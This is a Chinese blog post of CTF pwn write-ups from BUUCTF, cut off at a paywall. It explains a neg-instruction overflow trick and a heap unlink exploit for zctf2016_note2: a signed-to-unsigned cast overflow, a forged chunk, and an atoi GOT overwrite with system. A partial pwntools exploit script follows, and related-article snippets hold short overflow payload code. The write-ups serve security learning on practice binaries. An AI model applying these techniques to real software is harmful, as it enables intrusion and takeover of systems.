BUUCTF-PWN刷题记录-10

最新推荐文章于 2025-04-23 00:08:14 发布
最新推荐文章于 2025-04-23 00:08:14 发布
阅读量960 收藏 1
点赞数
分类专栏: BUU-PWN 文章标签: python 字符串 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44145820/article/details/105593354
版权
本文详细记录了四个CTF比赛中的PWN题目,涉及栈溢出、强制转换溢出、格式化字符串漏洞和堆溢出等技术。通过分析题目和编写exploit,解释了如何利用neg操作、强制转换、格式化字符串和堆管理来实现漏洞利用,最终获取flag或系统权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

wustctf2020_number_game(neg操作原理)

需要输入一个数,变为负数之后还是负数
在这里插入图片描述
这题就涉及计组知识了,neg的操作为按位取反+1,而0x80000000取反加一之后仍然是0x80000000,所以答案为-2147483648

zctf2016_note2(强制转换溢出,unlink)

在这里插入图片描述
这次可以考虑覆写got表了
在my_read中存在一个强制转换的漏洞
a2为传入的buf长度,类型为有符号数,然后用a2-1与无符号数i进行比较,此时会将有符号数强制转换为无符号数,如果a2为0,减一之后就是0xffffffff,这样就能进行堆溢出
在这里插入图片描述
在edit中使用了strcpy或者strncat把堆的内容从缓冲区复制到堆上,所以编辑时如果有’\x00’就会截断
在这里插入图片描述
利用过程如下:

  1. 申请一个heap[0],大小为0x80,在其中伪造一个chunk
  2. 申请heap[1,2],1大小为0,但是会分配到一个0x20大小的chunk,2的大小必须为0x80,否则会进入fastbin而跳过unlink
  3. 删除1,再申请一个大小为0的heap,把heap[2]的chunk头部进行修改
  4. 删除2,unlink成功,然后往heap[0]中写入’a’*0x18+p64(atoi_got),show即可泄露地址,然后用edit改为system地址并输入/bin/sh即可

Exp:

from pwn import *

r = remote("node3.buuoj.cn", 29136)
#r = process("./zctf2016_note2")

context.log_level = 'debug'
DEBUG = 0
if DEBUG:
	gdb.attach(r, 
	'''
	b *0x401021
	x/10gx 0x602120
	c
	''')
elf = ELF("./zctf2016_note2")
libc = ELF('./libc/libc-2.23.so')
one_gadget_16 = [0x45216,0x4526a,0xf02a4,0xf1147]
bss_ptr = 0x602120
atoi_got = elf.got['atoi']


menu = "option--->>\n"
def add(size, content):
	r.recvuntil(menu)
	r.sendline('1')
	r.recvuntil("Input the length of the note content:(less than 128)\n")
	r.sendline(str(size))
	r.recvuntil("Input the note content:\n")
	r.send(content)

def delete(index):
	r.recvuntil(menu)
	r.sendline('4')
	r.recvuntil("Input the id of the note:\n")
	r.sendline(str(index))

def show(index):
	r.recvuntil(menu)
	r.sendline('2')
	r.recvuntil("Input the id of the note:\n")
	r.sendline(str(index))

def edit(index, way, content):
	r.recvuntil(menu)
	r.sendline('3')
	r.recvuntil("Input the id of the note:\n")
	r
最低0.47元/天 解锁文章
pwn入门题——starting(1)
qq_44302282的博客
05-05 381
level0 题目来源:攻防世界—level0 链接:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5053&page=1 1、首先,执行基本步骤(前面已经说过了),看图 2、 接下来,打开64位的ida 3、在左边的函数窗口里面找到main函数,打开它,tab键可以切换反...
BUUCTF-pwn题记(22-7-30更新)
Morphy_Amo的博客
03-04 4454
BUUCTF题记
攻防世界:PWN题(一)
m0_53932372的博客
12-30 1672
cgpwn2 32bit,漏洞:溢出 这题很简单,第一次输入参数“/bin/sh”到一个bss区域,第二次利用溢出getshell exp: from pwn import * io = remote('111.200.241.244',61742) sys_addr = 0x08048420 io.recvuntil("your name\n") io.sendline("/bin/sh") bin_sh_addr =0x0804A080 io.recvuntil("leave some messag
pwn_recording(buuctf2-6)
最新发布
xcellencw的博客
04-23 701
checksecIDA64打开,shift+F12查看有system函数和/bin/sh如何查看他们的位置呢?两种点击fun函数进去 /bin/sh 0x40118A以下才是它libc中的地址(动态),而用ROPgadget --binary rip --string '/bin/sh'查的是静态地址填充数据如何算呢?这里推荐①cyclic 200,先创建200个数据;②pwndbg > run ,在pwndbg中运行程序;运行到如下图所示。
PWN入门题——BUUCTF(1-4)
ChenD的学习笔记
09-23 807
最近为了学校组织的ctf比赛才开始接触pwn的刚刚做了十多道题现在来记一下,记完了接着学后面贼难的内容!
BUUCTF PWN 题 1-15题
农夫果园好好喝的博客
08-21 2412
经典溢出漏洞。
BUUCTF PWN题记 (未完待续)
qq_41071646的博客
08-01 2082
最近找了一个新的CTF比赛平台 但是不知道为啥pwn的服务器总是连不上, 所以到时候还是直接本地打 默认2.23 so 如果 有高版本的话 我再切换,,, 逆向的话 先等等吧,,,先不。。等有空了再 第一题 连上就有flag的pwn 直接 运行就有权限,。 第二题 RIP覆盖一下 这个没有任何保护 直接 覆盖rip就可以了 from pwn import * conte...
BUUCTF-PWN题记-14
weixin_44145820的博客
04-29 878
sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这题原题目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这题应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
BUUCTF-PWN题记25(IO file attack)
weixin_44145820的博客
08-14 1732
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
BUUCTF-PWN题记-22
weixin_44145820的博客
05-18 781
ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
buuctf——pwn题之旅(持续更新)
qq_42988973的博客
12-16 657
buuctf-pwn 的一些wp
Pwn题记(不停更新)
qq_66013948的博客
06-23 464
​ 发现了个事儿,for循环会执行两次,所以这里采用第一次不溢出,通过格式化字符串漏洞对Canary的值进行泄露,之后就可以在合适的地方填入canary的值来绕过canary保护了。​ 之后就是具体进行溢出了,计算溢出的长度也比较简单,这里直接上答案吧,116字节,不过,第100到104为canary的值。​ 根据这俩进行计算,可得到偏移,结果是0x7c/4=31。​ 除了NX之外,似乎就只有 Canary了。​ 因此,思路就很明确了。
PWN题记(1)--ciscn_2019_n_5
小心信科理化声
05-10 390
这是第一篇的题记,从ret2text开始起 0x1 程序分析 先checksec 一下 64位的小端序,NX没开启,妥妥的写shellcode 拖入IDA中查看一下 main函数如下 可以看到gets(text)有明显的溢出 然后还可以看到关键的read函数,可以做libc泄露用,先留着 然后查找一下有没有能用到的system函数和binsh 无system函数 估计也没有binsh了 咋办呢>? 看一下有没有可读可写可执行的字段呢? 看看这里的两个变量:name\text 存在!
攻防世界pwn题笔记(实时更新)
zzh258369的博客
02-27 593
学了点逆向又来接触点pwn方面的题,现在学习效率有点低下,需要再不断提高Pwn是指攻击者通过漏洞利用技术,获取目标系统或程序的控制权,进而执行任意代码、窃取数据等恶意操作,以达到破坏系统安全、获取敏感信息等目的的行为过程。比如攻击者利用软件中的缓冲区溢出漏洞,改写程序的执行流程,让程序执行攻击者预先准备好的恶意代码。具体相关描述后面遇到会详细解释作为引导模式的第一题,一看难度竟然是7,一下子就慌了,但是事实上这道题很简单下载好后放入虚拟机里,先简单逆向分析一下,没发现任何东西其实就简单linux指令。
NSSCTF PWN方向题记
CyhStyrl的博客
04-03 903
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
pwn入门题——starting
qq_44302282的博客
05-04 1786
运行就能拿到shell呢,真的 题目来源:攻防世界------运行就能拿到shell呢,真的 链接:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5049&page=1 先从最简单的题入手(虽然我先的不是这道题,emmmm) (作为小白,刚开始的这些步骤我真的不知道,所以我...
我又pwn了 ——题篇 ciscn_s_3
m0_64195960的博客
08-08 668
ret2csu&SROP
二进制的保护机制
weixin_30872671的博客
05-29 308
这里主要讲的是CTF中linux下的ELF二进制文件的保护机制。在linux中有一个脚本checksec命令可以查看当前二进制文件的保护机制。任意安装一款gdb插件都会把checksec脚本包含进来。 在gdb中执行: gdb> checksec test Canary : No NX ...
buuctf-pwn入门
01-26
### BUUCTF PWN题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote('example.com', 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b'A' * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值